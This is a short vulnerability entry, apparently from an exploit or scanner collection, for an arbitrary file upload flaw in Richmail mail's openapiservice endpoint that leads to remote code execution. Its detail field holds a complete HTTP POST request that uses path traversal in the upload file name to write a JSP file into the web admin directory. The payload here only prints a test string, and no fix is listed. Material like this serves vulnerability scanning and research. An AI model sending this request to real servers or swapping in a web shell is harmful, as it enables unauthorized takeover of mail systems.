vendor = "Richmail"
name = "Richmail邮件openapiservice任意文件上传"
type = "RCE"
version = "未知"
path = "/webadmin/service/openapiservice?func=upload:letterImageUpload"
detail = "POST /webadmin/service/openapiservice?func=upload:letterImageUpload HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ... ------WebKitFormBoundary Content-Disposition: form-data; name=\"imageX\" 0 ------WebKitFormBoundary Content-Disposition: form-data; name=\"imageY\" 0 ------WebKitFormBoundary Content-Disposition: form-data; name=\"submit\" 提交 ------WebKitFormBoundary Content-Disposition: form-data; name=\"filename\"; filename=\"../../../../../web/webmailsvr/admin/12.jsp\" Content-Type: text/plain <% out.println(\"Vulnerable!\"); %> ------WebKitFormBoundary--"
fix = "未知"
date = "0708"
label = "1day"
verifier = "AdySec"
